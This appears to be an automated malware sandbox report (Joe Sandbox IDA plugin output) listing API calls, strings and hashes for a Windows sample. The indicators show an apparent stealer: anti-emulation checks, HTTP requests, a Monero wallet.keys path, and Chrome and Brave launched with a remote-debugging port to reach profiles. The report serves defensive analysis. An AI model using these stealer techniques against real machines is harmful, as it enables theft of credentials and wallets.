                                        • Nodes: 1450 (e26d93); 1451 (e26daa); 1453 (e26d5a-e26d77: call e2ade0, OpenEventA); 1454 (e26dac-e26dc2: call e26bc0, call e25d60, CloseHandle, ExitProcess); 1459 (e26d95-e26da4: CloseHandle, Sleep); 1460 (e26d79-e26d91: call e2ade0, CreateEventA)
                                        • Edges: 1450->1451; 1451->1453; 1451->1454; 1453->1459; 1453->1460; 1459->1451; 1460->1454
                                        APIs
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01A88938,?,00E310F4,?,00000000,?,00E310F8,?,00000000,00E30AF3), ref: 00E26D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E26D88
                                        • CloseHandle.KERNEL32(00000000), ref: 00E26D99
                                        • Sleep.KERNEL32(00001770), ref: 00E26DA4
                                        • CloseHandle.KERNEL32(?,00000000,?,01A88938,?,00E310F4,?,00000000,?,00E310F8,?,00000000,00E30AF3), ref: 00E26DBA
                                        • ExitProcess.KERNEL32 ref: 00E26DC2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                        • String ID:
                                        • API String ID: 941982115-0
                                        • Opcode ID: d38760929d17c6b70def5727af49b99ded711719dd670ddf734369220a201d39
                                        • Instruction ID: b5c441181800a468162fdbc968e77f6a83acb5214f22edde38d1078361d5e09f
                                        • Opcode Fuzzy Hash: d38760929d17c6b70def5727af49b99ded711719dd670ddf734369220a201d39
                                        • Instruction Fuzzy Hash: 33F05E30A44229EFEB10BBA0FD0ABBE33B4AF04B05F141619B512B9184CBB55900CB91

                                        Control-flow Graph

                                        APIs
                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14889
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14899
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CrackInternetlstrlen
                                        • String ID: <
                                        • API String ID: 1274457161-4251816714
                                        • Opcode ID: 83fecc6b1f85e26d098ac72a3ac90cb972b9ba9eee018cadf30f0e3784f0f809
                                        • Instruction ID: a9a20ec5fd2f29cdf1e658c004ceef4f48c932f71b47d10ad097c1f5cefb2c69
                                        • Opcode Fuzzy Hash: 83fecc6b1f85e26d098ac72a3ac90cb972b9ba9eee018cadf30f0e3784f0f809
                                        • Instruction Fuzzy Hash: 052142B1D00209ABDF14DF64E84AADE7BB5FB45350F149625FA15B72C0EB706609CF81

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E162D0: InternetOpenA.WININET(00E30DFF,00000001,00000000,00000000,00000000), ref: 00E16331
                                          • Part of subcall function 00E162D0: StrCmpCA.SHLWAPI(?,01A8F1A8), ref: 00E16353
                                          • Part of subcall function 00E162D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E16385
                                          • Part of subcall function 00E162D0: HttpOpenRequestA.WININET(00000000,GET,?,01A8EB30,00000000,00000000,00400100,00000000), ref: 00E163D5
                                          • Part of subcall function 00E162D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E1640F
                                          • Part of subcall function 00E162D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E16421
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25478
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                        • String ID: ERROR$ERROR
                                        • API String ID: 3287882509-2579291623
                                        • Opcode ID: f34ee74ca7a300730f9c4a958de5a265500f3ad74c3084e94d5a0e8ae5c3bd66
                                        • Instruction ID: 4f739a58af83c770ace580f96884ff4445422dc11117de31850d268a7e344107
                                        • Opcode Fuzzy Hash: f34ee74ca7a300730f9c4a958de5a265500f3ad74c3084e94d5a0e8ae5c3bd66
                                        • Instruction Fuzzy Hash: 4B1116719001189BCB14FF64ED52AED77B9AF50340F445568F91B77492EF30AB44CB51
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27AA0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E27AA7
                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 00E27ABF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateComputerNameProcess
                                        • String ID:
                                        • API String ID: 1664310425-0
                                        • Opcode ID: 1a48543ed5c10a63bf5083c8ad0219b3f978d1384b598f3bc94ec81e9d403821
                                        • Instruction ID: cedbbfc3e4ee894899455e12eacb3473f566f6eddb207724ab6dc16792ccb439
                                        • Opcode Fuzzy Hash: 1a48543ed5c10a63bf5083c8ad0219b3f978d1384b598f3bc94ec81e9d403821
                                        • Instruction Fuzzy Hash: F50186B1908359ABC710CF99ED45BAFBBB8F704B21F100219F545F6280D7755A00C7E1
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E1112B
                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E11132
                                        • ExitProcess.KERNEL32 ref: 00E11143
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                        • String ID:
                                        • API String ID: 1103761159-0
                                        • Opcode ID: 21b883d0efe9db106f37bc8e3267264337461a931a0ab32ee431065daf40e677
                                        • Instruction ID: 116e265f96f8714629de8094f28fc7862949de5ee2427e4157431bbd3fe248d5
                                        • Opcode Fuzzy Hash: 21b883d0efe9db106f37bc8e3267264337461a931a0ab32ee431065daf40e677
                                        • Instruction Fuzzy Hash: 45E08670E45308FBE7209B919C0AB4C76A89B04F05F100084F7087A1C0C6B925404798
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E110B3
                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00E110F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree
                                        • String ID:
                                        • API String ID: 2087232378-0
                                        • Opcode ID: 321e4e1eb9980f460e5835835aaedff52793286c7e80e1c30cb73116095fb43e
                                        • Instruction ID: c457123be73b54ccc5edec415f0e03fb31d9595c0014de670908a49bb04f0d9d
                                        • Opcode Fuzzy Hash: 321e4e1eb9980f460e5835835aaedff52793286c7e80e1c30cb73116095fb43e
                                        • Instruction Fuzzy Hash: 29F0E971641314BBE71496A4AC59FAFB7D8E705B04F301488F540E7280D5729E0087A0
                                        APIs
                                          • Part of subcall function 00E27A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27AA0
                                          • Part of subcall function 00E27A70: RtlAllocateHeap.NTDLL(00000000), ref: 00E27AA7
                                          • Part of subcall function 00E27A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00E27ABF
                                          • Part of subcall function 00E279E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E111B7), ref: 00E27A10
                                          • Part of subcall function 00E279E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E27A17
                                          • Part of subcall function 00E279E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E27A2F
                                        • ExitProcess.KERNEL32 ref: 00E111C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                                        • String ID:
                                        • API String ID: 3550813701-0
                                        • Opcode ID: 891fe4e3c72f09d6925307b468a1e73a46b6a5b683f82db4b4bf5b0373e820c2
                                        • Instruction ID: 1d2ad1ef3a25cf2900471a03f2e233a19e025410070402b179e92e25150bff31
                                        • Opcode Fuzzy Hash: 891fe4e3c72f09d6925307b468a1e73a46b6a5b683f82db4b4bf5b0373e820c2
                                        • Instruction Fuzzy Hash: CEE012B9A0532167CA2073B57D07B5B32CC5B1474EF402458FA44A6106FD2AE8404365
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00E30B32,00E30B2F,00000000,?,?,?,00E31450,00E30B2E), ref: 00E1BEC5
                                        • StrCmpCA.SHLWAPI(?,00E31454), ref: 00E1BF33
                                        • StrCmpCA.SHLWAPI(?,00E31458), ref: 00E1BF49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1C8A9
                                        • FindClose.KERNEL32(000000FF), ref: 00E1C8BB
                                        Strings
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 00E1C534
                                        • Google Chrome, xrefs: 00E1C6F8
                                        • \Brave\Preferences, xrefs: 00E1C1C1
                                        • Preferences, xrefs: 00E1C104
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 00E1C3B2
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 00E1C495
                                        • Brave, xrefs: 00E1C0E8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                        • API String ID: 3334442632-1869280968
                                        • Opcode ID: 60f3190c686d29f7b89e5400a5d1a1d68d046822ac67e98710dde9183cbf1cb1
                                        • Instruction ID: 9004a5e3ddbaf6a049f6f9d87ed9de62cdd2abeab02300b989e80aae9573df8a
                                        • Opcode Fuzzy Hash: 60f3190c686d29f7b89e5400a5d1a1d68d046822ac67e98710dde9183cbf1cb1
                                        • Instruction Fuzzy Hash: EC5257729101185BCB14FB70ED96EEE73BDAF54304F4455A8B50AB6081EF349B48CFA2
                                        APIs
                                        • wsprintfA.USER32 ref: 00E23B1C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00E23B33
                                        • lstrcat.KERNEL32(?,?), ref: 00E23B85
                                        • StrCmpCA.SHLWAPI(?,00E30F58), ref: 00E23B97
                                        • StrCmpCA.SHLWAPI(?,00E30F5C), ref: 00E23BAD
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E23EB7
                                        • FindClose.KERNEL32(000000FF), ref: 00E23ECC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                        • API String ID: 1125553467-2524465048
                                        • Opcode ID: 5fe93c820b04da049bc8b1f360577e82ffe6b8d2ec1640b3a9b922b7f211c3a8
                                        • Instruction ID: 4538ea6ee1afc6faaf1c0a5776bfee90fac79b61e9e9ec97bde7f49f5345a7e7
                                        • Opcode Fuzzy Hash: 5fe93c820b04da049bc8b1f360577e82ffe6b8d2ec1640b3a9b922b7f211c3a8
                                        • Instruction Fuzzy Hash: 1AA141B1A003189BDB34DF64DC85FEA73B9BB48700F044588F64DAA185DB759B88CFA1
                                        APIs
                                        • wsprintfA.USER32 ref: 00E24B7C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00E24B93
                                        • StrCmpCA.SHLWAPI(?,00E30FC4), ref: 00E24BC1
                                        • StrCmpCA.SHLWAPI(?,00E30FC8), ref: 00E24BD7
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E24DCD
                                        • FindClose.KERNEL32(000000FF), ref: 00E24DE2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
